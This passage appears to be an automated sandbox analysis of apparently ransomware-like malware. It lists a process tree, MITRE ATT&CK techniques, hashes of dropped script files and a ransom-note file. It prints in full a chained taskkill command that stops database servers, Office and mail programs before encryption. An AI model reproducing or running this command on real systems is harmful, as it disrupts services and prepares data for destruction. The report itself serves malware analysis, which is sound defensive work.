C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
2⤵
PID:572

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msftesql.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:552

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlagent.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlbrowser.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlwriter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\SysWOW64\taskkill.exe
taskkill /im oracle.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocssd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbsnmp.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\SysWOW64\taskkill.exe
taskkill /im synctime.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopqos.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\SysWOW64\taskkill.exe
taskkill /im isqlplussvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\SysWOW64\taskkill.exe
taskkill /im xfssvccon.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:456

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopservice.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocautoupds.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\SysWOW64\taskkill.exe
taskkill /im encsvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1188

C:\Windows\SysWOW64\taskkill.exe
taskkill /im firefoxconfig.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1728

C:\Windows\SysWOW64\taskkill.exe
taskkill /im tbirdconfig.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1060

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocomm.exe
3⤵
- Kills process with taskkill
PID:1924

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld.exe
3⤵
- Kills process with taskkill
PID:1428

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-nt.exe
3⤵
- Kills process with taskkill
PID:1452

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-opt.exe
3⤵
- Kills process with taskkill
PID:872

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbeng50.exe
3⤵
- Kills process with taskkill
PID:1752

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqbcoreservice.exe
3⤵
- Kills process with taskkill
PID:1156

C:\Windows\SysWOW64\taskkill.exe
taskkill /im excel.exe
3⤵
- Kills process with taskkill
PID:1576

C:\Windows\SysWOW64\taskkill.exe
taskkill /im infopath.exe
3⤵
- Kills process with taskkill
PID:1572

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msaccess.exe
3⤵
- Kills process with taskkill
PID:1884

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mspub.exe
3⤵
- Kills process with taskkill
PID:616

C:\Windows\SysWOW64\taskkill.exe
taskkill /im onenote.exe
3⤵
- Kills process with taskkill
PID:1512

C:\Windows\SysWOW64\taskkill.exe
taskkill /im outlook.exe
3⤵
- Kills process with taskkill
PID:1464

C:\Windows\SysWOW64\taskkill.exe
taskkill /im powerpnt.exe
3⤵
- Kills process with taskkill
PID:1996

C:\Windows\SysWOW64\taskkill.exe
taskkill /im steam.exe
3⤵
- Kills process with taskkill
PID:1968

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat.exe
3⤵
- Kills process with taskkill
PID:1920

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat64.exe
3⤵
- Kills process with taskkill
PID:1824

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thunderbird.exe
3⤵
- Kills process with taskkill
PID:1904

C:\Windows\SysWOW64\taskkill.exe
taskkill /im visio.exe
3⤵
- Kills process with taskkill
PID:1272

C:\Windows\SysWOW64\taskkill.exe
taskkill /im winword.exe
3⤵
- Kills process with taskkill
PID:1184

C:\Windows\SysWOW64\taskkill.exe
taskkill /im wordpad.exe
3⤵
- Kills process with taskkill
PID:1568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe
2⤵
PID:308

C:\Windows\SysWOW64\taskkill.exe
taskkill /im notepad.exe
3⤵
- Kills process with taskkill
PID:860

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt
2⤵
PID:1052

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Read_Me!_.txt
2⤵
PID:1272

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Bypass User Account Control

1

T1088

Scheduled Task

1

T1053

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

1

T1089

Modify Registry

2

T1112

File Deletion

2

T1107

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

3

T1082

Process Discovery

1

T1057

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Read_Me!_.txt
Filesize
1KB

MD5
e382db7cbeee5b5287c0cfe1d13ff4c3

SHA1
c4700668014b198bd064df0ae6fcce863df585e5

SHA256
40f8d2803f7831e697ed3310d713979103b7d245a336d3eeae30b0aaa0f44848

SHA512
a8950f5641507a8900621ad3a4b2cf9adb375921d70c2725f79a77ae180dd56a8ce2f4b94b0a77cc00678cdf72d70bc94bfb309538dfd12ac963b7031aee4572

Download Submit
C:\Users\Admin\AppData\h4_svc.bat
Filesize
2KB

MD5
64d589b71fbf0cdc2c9bdb2ec62d5598

SHA1
dafa76bf4125d2621c06914b5ea7f63355867e31

SHA256
be014b2ea649d22a59ea48725ac8dbb38b47aaca52559ca188d73daa96e8df89

SHA512
b8f1e49a0fb8c50b6c7d3864cc42c9c470f519425cc02c6f3353d97177378f9b02b18322af01a39c0cde8e4ddabe4611821a38b04bc7f5025eb4cab4c64ef07e

Download Submit
C:\Users\Admin\AppData\t2_svc.bat
Filesize
138B

MD5
702f5dc6f9dec28c8c9b7b6885c9fe09

SHA1
dbb85da6de899deb21ce0a8f25c1726cd19e49e8

SHA256
20bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9

SHA512
fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7

Download Submit
C:\Users\Admin\AppData\v9_svc.vbs
Filesize
686B

MD5
e9c50acda9063b2462697bdbd0a0dfe2

SHA1
d1a2bc54905ce0e9121f8e5c249e0527f2190b7e

SHA256
f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd

SHA512
d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9

Download Submit
C:\Users\Read_Me!_.txt
Filesize
1KB

MD5
e382db7cbeee5b5287c0cfe1d13ff4c3

SHA1
c4700668014b198bd064df0ae6fcce863df585e5

SHA256
40f8d2803f7831e697ed3310d713979103b7d245a336d3eeae30b0aaa0f44848

SHA512
a8950f5641507a8900621ad3a4b2cf9adb375921d70c2725f79a77ae180dd56a8ce2f4b94b0a77cc00678cdf72d70bc94bfb309538dfd12ac963b7031aee4572

Download Submit
memory/332-63-0x0000000000000000-mapping.dmp

Download
memory/388-69-0x0000000000000000-mapping.dmp

Download
memory/456-107-0x0000000000000000-mapping.dmp

Download
memory/552-95-0x0000000000000000-mapping.dmp

Download
memory/572-94-0x0000000000000000-mapping.dmp

Download
memory/584-99-0x0000000000000000-mapping.dmp

Download
memory/596-75-0x0000000000000000-mapping.dmp

Download
memory/616-65-0x0000000000000000-mapping.dmp

Download
memory/616-123-0x0000000000000000-mapping.dmp

Download
memory/624-101-0x0000000000000000-mapping.dmp

Download
memory/656-83-0x0000000000000000-mapping.dmp

Download
memory/676-88-0x0000000000000000-mapping.dmp

Download
memory/848-74-0x0000000000000000-mapping.dmp

Download
memory/872-117-0x0000000000000000-mapping.dmp

Download
memory/904-109-0x0000000000000000-mapping.dmp

Download
memory/912-59-0x0000000000000000-mapping.dmp

Download
memory/1060-113-0x0000000000000000-mapping.dmp

Download
memory/1076-67-0x0000000000000000-mapping.dmp

Download
memory/1092-102-0x0000000000000000-mapping.dmp

Download
memory/1120-54-0x00000000759E1000-0x00000000759E3000-memory.dmp

Filesize
8KB

Download
memory/1156-119-0x0000000000000000-mapping.dmp

Download
memory/1184-80-0x0000000000000000-mapping.dmp

Download
memory/1188-111-0x0000000000000000-mapping.dmp

Download
memory/1260-57-0x0000000000000000-mapping.dmp

Download
memory/1428-115-0x0000000000000000-mapping.dmp

Download
memory/1444-78-0x0000000000000000-mapping.dmp

Download
memory/1448-90-0x0000000000000000-mapping.dmp

Download
memory/1452-116-0x0000000000000000-mapping.dmp

Download
memory/1460-76-0x0000000000000000-mapping.dmp

Download
memory/1464-125-0x0000000000000000-mapping.dmp

Download
memory/1512-124-0x0000000000000000-mapping.dmp

Download
memory/1512-86-0x0000000000000000-mapping.dmp

Download
memory/1528-106-0x0000000000000000-mapping.dmp

Download
memory/1552-55-0x0000000000000000-mapping.dmp

Download
memory/1568-82-0x0000000000000000-mapping.dmp

Download
memory/1572-121-0x0000000000000000-mapping.dmp

Download
memory/1572-81-0x0000000000000000-mapping.dmp

Download
memory/1576-120-0x0000000000000000-mapping.dmp

Download
memory/1620-98-0x0000000000000000-mapping.dmp

Download
memory/1620-79-0x0000000000000000-mapping.dmp

Download
memory/1620-56-0x0000000000000000-mapping.dmp

Download
memory/1628-77-0x0000000000000000-mapping.dmp

Download
memory/1664-110-0x0000000000000000-mapping.dmp

Download
memory/1704-84-0x0000000000000000-mapping.dmp

Download
memory/1708-85-0x0000000000000000-mapping.dmp

Download
memory/1728-64-0x0000000000000000-mapping.dmp

Download
memory/1728-112-0x0000000000000000-mapping.dmp

Download
memory/1732-73-0x0000000000000000-mapping.dmp

Download
memory/1732-108-0x0000000000000000-mapping.dmp

Download
memory/1748-104-0x0000000000000000-mapping.dmp

Download
memory/1748-71-0x0000000000000000-mapping.dmp

Download
memory/1752-118-0x0000000000000000-mapping.dmp

Download
memory/1764-100-0x0000000000000000-mapping.dmp

Download
memory/1816-96-0x0000000000000000-mapping.dmp

Download
memory/1824-105-0x0000000000000000-mapping.dmp

Download
memory/1884-122-0x0000000000000000-mapping.dmp

Download
memory/1904-92-0x0000000000000000-mapping.dmp

Download
memory/1920-70-0x0000000000000000-mapping.dmp

Download
memory/1924-114-0x0000000000000000-mapping.dmp

Download
memory/1932-87-0x0000000000000000-mapping.dmp

Download
memory/1968-103-0x0000000000000000-mapping.dmp

Download
memory/1976-72-0x0000000000000000-mapping.dmp

Download
memory/1996-126-0x0000000000000000-mapping.dmp

Download
memory/2032-97-0x0000000000000000-mapping.dmp

Download
memory/2032-58-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads